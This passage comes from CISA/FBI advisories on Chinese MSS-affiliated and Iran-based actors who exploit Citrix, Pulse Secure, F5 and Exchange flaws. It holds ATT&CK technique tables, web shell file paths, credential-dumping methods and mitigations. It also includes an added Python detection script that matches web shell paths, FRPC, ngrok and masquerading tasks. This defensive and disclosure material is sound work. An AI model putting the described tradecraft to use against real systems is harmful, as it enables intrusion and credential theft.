Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. 
CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>)\n\n| \n\nNetwork Service Scanning\n\n| \n\nCISA has observed suspicious network scanning activity for various ports at Federal Government entities. \n \n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>)\n\n| \n\nEmail Collection\n\n| \n\nCISA observed the actors targeting CVE-2020-0688 to collect emails from the exchange servers found in Federal Government environments. \n \n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actor\u2019s carefully choose proxy tools depending on their intended use. 
These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. 
For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).

_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_

Vulnerability | Vulnerable Products | Patch Information
---|---|---
[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) | [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)
[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | Citrix Application Delivery Controller; Citrix Gateway; Citrix SDWAN WANOP | [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>); [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>); [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)
[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15; Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15 | [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)
[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) | Microsoft Exchange Servers | [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)

CISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors’ operations and protect organizations’ resources and information systems.

### Contact Information

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).

### References

[[1] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)

[[2] U.S. Department of Justice Press Release](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)

[[3] Shodan](<https://www.shodan.io>)

[[4] MITRE Common Vulnerabilities and Exposures List](<https://cve.mitre.org>)

[[5] National Institute of Standards and Technology National Vulnerability Database](<https://nvd.nist.gov/>)

[[6] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)

[[7] CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)

[[8] CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)

[[9] CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)

[[10] GitHub](<https://www.GitHub.com>)

[[11] Exploit-DB](<https://www.exploit-db.com/>)

[[12] What is Mimikatz: The Beginner's Guide (VARONIS)](<https://www.varonis.com/blog/what-is-mimikatz/>)

### Revisions

September 14, 2020: Initial Version

Advisory: [AA20-258A: Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a>)

### Summary

_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._

This product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor’s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities.
This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.

This Advisory provides the threat actor’s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.

[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.

### Technical Details

CISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.

After gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor’s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor’s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.

CISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.

Table 1 illustrates some of the common tools this threat actor has used.

_Table 1: Common exploit tools_

Tool | Detail
---|---
ChunkyTuna web shell | ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data.
Tiny web shell | Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic.
China Chopper web shell | China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords.
FRPC | FRPC is a modified version of the open-source FRP tool. It allows a system—inside a router or firewall providing Network Address Translation—to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as a reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence.
Chisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network.
ngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS.
Nmap | Nmap is used for vulnerability scanning and network discovery.
Angry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc.
Drupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices.

Notable means of detecting this threat actor:

 * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.
 * The threat actor uses FRPC over port 7557.
 * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.

The following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.

 * Tiny web shell
   * `/netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php`
   * `/netscaler/ns_gui/vpn/images/vpn_ns_gui.php`
   * `/var/vpn/themes/imgs/tiny.php`
 * ChunkyTuna web shell
   * `/var/vpn/themes/imgs/debug.php`
   * `/var/vpn/themes/imgs/include.php`
   * `/var/vpn/themes/imgs/whatfile`
 * Chisel
   * `/var/nstmp/chisel`

### MITRE ATT&CK Framework

#### Initial Access

As indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.

_Table 2: Initial access techniques_

ID | Technique/Sub-Technique | Context
---|---|---
[T1190](<https://attack.mitre.org/techniques/T1190/>) | Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902.

#### Execution

After gaining initial access, the threat actor began executing scripts, as shown in table 3.

_Table 3: Execution techniques_

ID | Technique/Sub-Technique | Context
---|---|---
[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>) | Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data.
[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>) | Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys, which was likely used as a password-changing mechanism.

#### Persistence

CISA observed the threat actor using the techniques identified in table 4 to establish persistence.

_Table 4: Persistence techniques_

ID | Technique/Sub-Technique | Context
---|---|---
[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>) | Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms).
[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>) | Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily.
[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) | Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna.
[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>) | Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`.

#### Privilege Escalation

CISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.

#### Defense Evasion

CISA observed the threat actor using the techniques identified in table 5 to evade detection.

_Table 5: Defensive evasion techniques_

ID | Technique/Sub-Technique | Context
---|---|---
[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>) | Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, helping the pre-compiled payloads avoid detection.
[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>) | Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection.
[T1036.004](<https://attack.mitre.org/techniques/T1245/>) | Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as a reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and it ran out of the Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok.
[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>) | Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library.
[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>) | Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device.

#### Credential Access

CISA observed the threat actor using the techniques identified in table 6 to further their credential access.

_Table 6: Credential access techniques_

ID | Technique/Sub-Technique | Context
---|---|---
[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) | OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS).
[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>) | OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file.
[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>) | Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials.
[T1555](<https://attack.mitre.org/techniques/T1555/>) | Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used the `kee.ps1` PowerShell script.
[T1558](<https://attack.mitre.org/techniques/T1558/>) | Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account.
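The detection indicators this advisory gives (the NetScaler web shell and Chisel paths, FRPC over port 7557, ngrok showing up as TCP/443 to external hosts, and the `lpupdate`/`svchost`/`dllhost.dll` masquerade from tables 4 and 5) pulled into one set of checks, as an added example that is not CISA's code; the flow-record format, the scheduled-task records and all sample data are constructed, and the beaconing threshold and the use of RFC 1918 space as "internal" are assumptions.

```python
"""Detection checks built from the indicators in this advisory (added example)."""
from __future__ import annotations

import ipaddress
from collections import Counter
from dataclasses import dataclass

# Paths the advisory lists for Tiny, ChunkyTuna and Chisel on a NetScaler
# compromised through CVE-2019-19781.
WEBSHELL_PATHS = {
    "/netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php": "Tiny web shell",
    "/netscaler/ns_gui/vpn/images/vpn_ns_gui.php": "Tiny web shell",
    "/var/vpn/themes/imgs/tiny.php": "Tiny web shell",
    "/var/vpn/themes/imgs/debug.php": "ChunkyTuna web shell",
    "/var/vpn/themes/imgs/include.php": "ChunkyTuna web shell",
    "/var/vpn/themes/imgs/whatfile": "ChunkyTuna web shell",
    "/var/nstmp/chisel": "Chisel",
}
FRPC_PORT = 7557       # advisory: the actor uses FRPC over port 7557
NGROK_PORT = 443       # advisory: ngrok appears as TCP/443 to external cloud hosts
BEACON_THRESHOLD = 5   # assumption: this many TCP/443 flows to one external host
INTERNAL_NETS = [ipaddress.ip_network(n)           # assumption: RFC 1918 = internal
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
LEGIT_SVCHOST_DIRS = ("\\windows\\system32\\", "\\windows\\syswow64\\")


@dataclass(frozen=True)
class Finding:
    indicator: str
    detail: str


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def check_file_paths(paths: list[str]) -> list[Finding]:
    """Match a NetScaler file listing against the advisory's artifact paths."""
    return [Finding(WEBSHELL_PATHS[p], p) for p in paths if p in WEBSHELL_PATHS]


def check_flows(lines: list[str]) -> list[Finding]:
    """Constructed flow format: '<ts> <src_ip>:<port> -> <dst_ip>:<port> <proto>'.
    Flags any TCP flow to port 7557 (FRPC) and any internal host that opens
    BEACON_THRESHOLD or more TCP/443 flows to the same external host."""
    findings: list[Finding] = []
    https_pairs: Counter = Counter()
    for line in lines:
        _ts, src, _arrow, dst, proto = line.split()
        src_ip = src.rsplit(":", 1)[0]
        dst_ip, dst_port = dst.rsplit(":", 1)
        if proto.lower() != "tcp":
            continue
        port = int(dst_port)
        if port == FRPC_PORT:
            findings.append(Finding("FRPC port 7557", f"{src_ip} -> {dst_ip}:{port}"))
        elif port == NGROK_PORT and not is_internal(dst_ip):
            https_pairs[(src_ip, dst_ip)] += 1
    for (src_ip, dst_ip), n in https_pairs.items():
        if n >= BEACON_THRESHOLD:
            findings.append(Finding("repeated TCP/443 to external host (possible ngrok)",
                                    f"{src_ip} -> {dst_ip} x{n}"))
    return findings


def check_scheduled_tasks(tasks: list[dict]) -> list[Finding]:
    """Constructed task records {'name', 'exe', 'args'} from a Windows host.
    The advisory's FRPC task was named lpupdate, its binary was named svchost
    and ran from the IME directory, and its config file was named dllhost.dll."""
    findings: list[Finding] = []
    for t in tasks:
        exe = t["exe"].lower().replace("/", "\\")
        basename = exe.rsplit("\\", 1)[-1]
        cmd = f'{t["exe"]} {t["args"]}'.strip()
        if t["name"].lower() == "lpupdate":
            findings.append(Finding("task named lpupdate", cmd))
        if basename in ("svchost", "svchost.exe") and not any(
                d in exe for d in LEGIT_SVCHOST_DIRS):
            findings.append(Finding("svchost running outside System32", cmd))
        if "dllhost.dll" in t["args"].lower():
            findings.append(Finding("dllhost.dll passed as a config file", cmd))
    return findings


# Constructed sample inputs (not real victim data).
SAMPLE_LISTING = ["/netscaler/ns_gui/vpn/index.html", "/var/vpn/themes/imgs/tiny.php",
                  "/var/vpn/themes/imgs/whatfile", "/var/nstmp/chisel"]
SAMPLE_FLOWS = (
    ["2020-09-01T10:00:00 10.0.0.5:51000 -> 203.0.113.10:7557 tcp"]
    + [f"2020-09-01T10:0{i}:00 10.0.0.7:5100{i} -> 198.51.100.20:443 tcp" for i in range(1, 6)]
    + ["2020-09-01T10:06:00 10.0.0.7:51010 -> 10.0.0.9:443 tcp",       # internal, ignored
       "2020-09-01T10:06:05 10.0.0.5:51011 -> 203.0.113.10:7557 udp"]  # not TCP, ignored
)
SAMPLE_TASKS = [
    {"name": "lpupdate", "exe": r"C:\Windows\IME\svchost.exe", "args": "-c dllhost.dll"},
    {"name": "GoogleUpdateTaskMachineUA",
     "exe": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe", "args": "/ua"},
    {"name": "SvcRestart", "exe": r"C:\Windows\System32\svchost.exe", "args": "-k netsvcs"},
]


def run_all() -> dict[str, list[Finding]]:
    return {"files": check_file_paths(SAMPLE_LISTING),
            "flows": check_flows(SAMPLE_FLOWS),
            "tasks": check_scheduled_tasks(SAMPLE_TASKS)}


if __name__ == "__main__":
    for source, findings in run_all().items():
        for f in findings:
            print(f"[{source}] {f.indicator}: {f.detail}")
```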
\n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. 
\n| [T1021.004](<https://attack.mitre.org/techniques/T1021/004/>) | Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink being used for encrypted sessions were found in the system registry hive. |\n| [T1021.005](<https://attack.mitre.org/techniques/T1021/005/>) | Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as a lateral movement tool. |\n| [T1563.002](<https://attack.mitre.org/techniques/T1563/002/>) | Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. |\n\n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1005](<https://attack.mitre.org/techniques/T1005/>) | Data from Local System | The threat actor searched local system sources to access sensitive documents. |\n| [T1039](<https://attack.mitre.org/techniques/T1039/>) | Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. |\n| [T1213](<https://attack.mitre.org/techniques/T1213/>) | Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. |\n| [T1530](<https://attack.mitre.org/techniques/T1530/>) | Data from Cloud Storage Object | The threat actor obtained files from the victim's cloud storage instances. |\n| [T1560.001](<https://attack.mitre.org/techniques/T1560/001/>) | Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. |
\n\n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\n| ID | Technique/Sub-Technique | Context |\n|---|---|---|\n| [T1071.001](<https://attack.mitre.org/techniques/T1071/001/>) | Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. |\n| [T1105](<https://attack.mitre.org/techniques/T1105/>) | Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. |\n| [T1572](<https://attack.mitre.org/techniques/T1572/>) | Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. |\n\n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration by this threat actor but assesses that exfiltration likely occurred, given the actor's use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. 
\n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": 